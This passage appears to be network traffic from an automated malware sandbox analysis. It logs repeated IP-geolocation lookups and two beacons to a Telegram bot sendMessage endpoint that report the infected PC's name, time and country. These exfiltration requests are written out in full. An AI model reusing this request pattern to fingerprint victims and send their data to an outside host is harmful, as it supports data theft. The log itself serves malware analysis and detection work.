                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.549785188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:25 UTC672INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:25 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50657
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYZacr3GOOZnQ4DrmSRa4Dbr1AntiL2zpM1qaGtKtQEyLNF8kFDMA2TwZS94uHKU9P71p74QJxjQ3uLq9RQMJ5uICn%2BvAPVIhcGHQC0m9wUPOeJf6VceU3yWDaNraIwK0rwbwkzl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a937fa4437a-EWR
                                                2024-10-08 10:45:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.549794188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:27 UTC672INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50658
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pMrUbM5U2ezIBv0S7qVStsZLvmyzBuoHyEdawGOodqM4l4skZU6tN7sdlhLjitWvqi4k4BoEP%2FUSNWe975tymxn6qRFnWFkmmwAMvBbsh8JIhYRVFGdIU0ZdAUwOad4MM2tq19e"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a9b88efc3f5-EWR
                                                2024-10-08 10:45:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.549795188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:27 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50658
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b41h9aA4nUCIp1pfmZc8d9mAycjhwIN73tiC8bO7oB710LllYVjQnX%2FCcILgtynxvwXyMJQcEe5QZqn0icvWPuWUQpXjXONsYvOaQfos2qlC%2FcUz2zyQBLkP3LAw%2BcIKeT0%2BiFcZ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a9baa0143b0-EWR
                                                2024-10-08 10:45:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.549803188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:28 UTC706INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50660
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBu3ErW0k%2Bixx3Dug8iQm4%2FrGXby%2FgAzeqEhVlzrAwj4eN99jzV0ZPzuQMSElmgk5MPaIqzxb5T4JXVIuxODQ2ORlTye21ob6WQjE57ZPe6PiyNI8JJHHAvTUhvDpGlfnohxx77M"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aa34ff67d24-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.549804188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:28 UTC682INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50660
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qtDBjU5N%2FmjggXQKWDm3VwUDYZIQhn74%2Bb0ByjIw5RS%2F6X1GDiYAimF4NzyEi97CIx6G9TiaTFmkPfyfzR3Fp7lxQUzmlgxFpDz6zR29M6%2FNb%2BvXyefUt%2FWTB5VDrSiSXNoB8aJ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aa388718c53-EWR
                                                2024-10-08 10:45:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.549811149.154.167.2204435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:28 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:29 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.549817188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:29 UTC682INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50661
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJWf%2B5WsRsix5nyMVRBgR%2Fe1wyUkYNi3G7j4cRLrnku8fkzbvue%2BGBlyUwZKnka06zt2JP07Xi%2FU6KY%2BanjcgYoRJ5zA4aygtYhvrYaayTYw9%2BNphni13DS7P0z4DcW6obbXuwPm"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aaadd2bc33d-EWR
                                                2024-10-08 10:45:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.549826188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:30 UTC676INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:30 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50662
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtoZLhf2FLdozu45SNpVvlrs2q7ib1e3eG79woDrbx0upi2q7pDnvbQNfINcajoT64I70MCPCTNHSkrVcXQQs5VmZdrGOnZwIGElX1FpMBhHhgqTjgdfU%2BOMe%2FVblY%2B0aPNlGtRn"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58ab25dd243b0-EWR
                                                2024-10-08 10:45:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.549836188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:32 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:32 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50664
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4C6nf2GTHbf2O0lelbqBb%2BnOpdt1iC57kv5OzHbeV2B8JreHZ3YaeALkE89V9Ps98X9mFwpEMep%2FrtIuGcwuJM70AXpuJr%2BaAbCXqYLtZhLASDdKO1v9m0AM4hzkfkH2Er35N%2BM"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58abbfcff4396-EWR
                                                2024-10-08 10:45:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.549848188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:33 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:33 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50665
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsP5ButQ1DgHae95fylIwDedhlWd%2FH6Z%2F3cVwrG7ZHaciF4DLnX8qLQ7eEomPj7Jj%2FRLGg7ei0ULpLgXWKRUkPlQsGNbYioD8f59kGlhC%2B01YBcrjvnlspD65nlnvpJyaryakqaw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58ac35b520c95-EWR
                                                2024-10-08 10:45:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.549853149.154.167.2204433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:34 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:34 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:34 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
